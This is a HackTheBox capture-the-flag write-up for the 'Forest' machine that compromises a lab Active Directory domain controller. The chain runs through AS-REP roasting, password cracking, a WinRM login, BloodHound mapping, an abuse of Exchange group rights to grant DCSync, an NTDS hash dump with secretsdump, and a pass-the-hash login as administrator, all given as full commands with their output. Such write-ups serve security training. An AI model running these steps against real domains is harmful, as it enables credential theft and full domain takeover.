As usual, first an nmap scan
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 secondsThere are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!
PORT 3268 (LDAP)
LDAP stands for Lightweight Directory Access Protocol , it is used for querying /locating data about organizations, individuals and other resources such as files and devices in a network so there is a tool for performing searches for users ,groups and etc.
https://github.com/ropnop/go-windapsearch
This is the tool that I found was working , there is no need to clone this simply go to releases and download the compiled binary
windapsearch-linux-amd64 -d 'htb.local' --dc 10.10.10.161 -m users
we could also use enum4linux to see if I can list some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001eAfter trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with John
┌─[puck@parrot-lt]─[~/htb/forrest] └──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads per process (8 total across 4 processes) Node numbers 1-4 of 4 (fork) Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB) 4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55 1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168 Waiting for 3 children to terminate 2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69 3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123 Session completed ┌─[puck@parrot-lt]─[~/htb/forrest]
So apparently Alfresco’s password is s3rvice. ll you have to do is get the user hash and start escalating privileges
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Privilege Escalation
Use Bloodhound and Sharphound.exe the same version !
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> upload SharpHound.exe Info: Uploading /home/puck/htb/forest/SharpHound.exe to C:\Users\svc-alfresco\Documents\puck\SharpHound.exe Data: 1395368 bytes of 1395368 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ./SharpHound.exe 2024-03-23T06:29:47.6623457-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound 2024-03-23T06:29:47.7871629-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2024-03-23T06:29:47.8183965-07:00|INFORMATION|Initializing SharpHound at 6:29 AM on 3/23/2024 2024-03-23T06:29:48.0371459-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local 2024-03-23T06:29:48.1621474-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2024-03-23T06:29:48.6465284-07:00|INFORMATION|Beginning LDAP search for htb.local 2024-03-23T06:29:48.7871527-07:00|INFORMATION|Producer has finished, closing LDAP channel 2024-03-23T06:29:48.7871527-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2024-03-23T06:30:19.3799074-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM 2024-03-23T06:30:34.9184755-07:00|INFORMATION|Consumers finished, closing output channel 2024-03-23T06:30:34.9809738-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2024-03-23T06:30:35.1372236-07:00|INFORMATION|Status: 161 objects finished (+161 3.5)/s -- Using 48 MB RAM 2024-03-23T06:30:35.1372236-07:00|INFORMATION|Enumeration finished in 00:00:46.4988600 2024-03-23T06:30:35.2153513-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings. 117 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-03-23T06:30:35.2309746-07:00|INFORMATION|SharpHound Enumeration Completed at 6:30 AM on 3/23/2024! Happy Graphing! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ls Directory: C:\Users\svc-alfresco\Documents\puck Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/23/2024 6:30 AM 18835 20240323063034_BloodHound.zip -a---- 3/23/2024 6:30 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -a---- 3/23/2024 6:29 AM 1046528 SharpHound.exe *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> download 20240323063034_BloodHound.zip Info: Downloading C:\Users\svc-alfresco\Documents\puck\20240323063034_BloodHound.zip to 20240323063034_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>
Then load the zip file directly into BloodHound by simply dragging
Putting all the pieces together, the following is our attack path.
- Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
- Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
- Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
- Perform a DcSync attack and dump the password hashes of all the users on the domain.
- Perform a Pass the Hash attack to get access to the administrator’s account.
Alright, let’s get started.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net user puck Password /add /domain The command completed successfully. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net users /domain User accounts for \\ ------------------------------------------------------------------------------- $331000-VK4ADACQNUCA Administrator andy DefaultAccount Guest HealthMailbox0659cc1 HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64 HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad HealthMailboxfd87238 krbtgt lucinda mark puck santi sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b svc-alfresco The command completed with one or more errors. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group Group Accounts for \\ ------------------------------------------------------------------------------- *$D31000-NSEL5BRJ63V7 *Cloneable Domain Controllers *Compliance Management *Delegated Setup *Discovery Management *DnsUpdateProxy *Domain Admins *Domain Computers *Domain Controllers *Domain Guests *Domain Users *Enterprise Admins *Enterprise Key Admins *Enterprise Read-only Domain Controllers *Exchange Servers *Exchange Trusted Subsystem *Exchange Windows Permissions *ExchangeLegacyInterop *Group Policy Creator Owners *Help Desk *Hygiene Management *Key Admins *Managed Availability Servers *Organization Management *Privileged IT Accounts *Protected Users *Public Folder Management *Read-only Domain Controllers *Recipient Management *Records Management *Schema Admins *Security Administrator *Security Reader *Server Management *Service Accounts *test *UM Management *View-Only Organization Management The command completed with one or more errors. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group "Exchange Windows Permissions" /add puck The command completed successfully. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck>
$pass = convertto-securestring 'Password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\puck', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity puck -Rights DCSync
and then dump
┌──(puck㉿kali)-[~/htb/forest] └─$ python3 secretsdump.py puck:Password@10.10.10.161 Impacket v0.9.25.dev1+20230823.145202.4518279 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: --snip-- puck:aes128-cts-hmac-sha1-96:1680bd7c6cd0d4b36a1db8a8541ec3f2 puck:des-cbc-md5:795d76612ac45dc7 FOREST$:aes256-cts-hmac-sha1-96:d5abc3475c9e0fe2ecced314be09464557acd9ab42e9023762f47bd26f3a1736 FOREST$:aes128-cts-hmac-sha1-96:de15b8b10df9fd952615a2f7157a9278 FOREST$:des-cbc-md5:0bef54cb2cb686b3 EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6 EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e EXCH01$:des-cbc-md5:8c45f44c16975129 [*] Cleaning up... ┌──(puck㉿kali)-[~/htb/forest]
.
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Author: Puckiestyle